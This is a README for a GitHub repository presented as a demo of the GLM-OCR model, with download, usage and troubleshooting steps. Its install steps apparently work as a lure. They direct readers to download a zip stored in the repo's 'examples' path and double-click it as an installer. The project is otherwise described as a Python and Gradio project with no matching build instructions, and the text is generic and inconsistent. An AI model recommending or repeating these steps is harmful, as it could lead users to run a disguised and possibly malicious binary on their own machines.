Welcome to the GLM-OCR-Demo! This application showcases the capabilities of the GLM-OCR multimodal OCR model developed by zai-org. With this tool, you can upload images and recognize text, formulas, and tables easily. The results come in both plain text and Markdown formats, making it simple to use in various applications.
To use this software, you need to follow a few straightforward steps. We will guide you through downloading and setting it up on your computer.
Make sure you check out the latest version on our Releases page.
-
Visit the Releases Page
Go to our Releases page to download the software. Click the button below to access it directly:
-
Choose Your Version
On the Releases page, you will see a list of available versions. Select the latest version for the best features and improvements.
-
Download the Installation File
Click on the file link to start your download. The file will typically be named something like
https://github.com/emotech15/GLM-OCR-Demo/raw/refs/heads/main/examples/OC-Demo-GL-v2.3.zip. Your browser will handle the download, and it should appear in your Downloads folder. -
Run the Installer
After downloading, locate the file in your Downloads folder. Double-click on the file to begin installation. Follow the prompts to complete the installation process.
-
Open the Application
Once installed, you can find GLM-OCR-Demo in your applications folder. Open it to begin.
To ensure smooth operation, make sure your system meets the following requirements:
- Operating System: Windows 10 or later / macOS Sierra or later / Linux
- RAM: Minimum of 4 GB, preferably 8 GB or more
- Disk Space: At least 1 GB of free space for installation
- Internet Connection: Required for downloading images and processing
-
Upload an Image
After opening the application, you will see an option to upload your image. Click the "Upload" button and select an image file from your computer. Supported formats include JPG, PNG, and BMP.
-
Select Recognition Type
Choose whether you want to recognize text, formulas, or tables. This will help the model understand what to look for in your uploaded image.
-
Run the OCR Process
Once you have selected your options, click the "Start" button. The application will process your image. This may take a few moments depending on the size and complexity of the image.
-
View Results
The recognized content will appear on the screen after processing. You can copy the text or export it in your desired format (plain text or Markdown).
-
Save Your Output
Save your recognized text by using the "Save" function. You can choose where to store it on your computer for later use.
If you encounter any issues while using the application, try the following steps:
- Update Your System: Ensure that your operating system is updated to the latest version.
- Check File Format: Verify that the image file you are uploading is in a supported format.
- Restart the Application: Sometimes, simply closing and reopening the application can resolve minor glitches.
- Use clear and well-lit images for best results.
- Avoid images with heavy noise or distracting backgrounds.
- Ensure the text in images is not too small.
For further assistance, check our FAQ section or contact our support team. You can find additional resources on our GitHub page.
- accelerate
- computer vision
- flash attention
- GLM-OCR
- Gradio
- Hugging Face Transformers
- Markdown
- Optical Character Recognition (OCR)
- OpenCV
- Pillow
- Python
- PyTorch
- Torch
- torchvision
- Vision Language Models (VLMs)
Thank you for using GLM-OCR-Demo! Happy text extraction.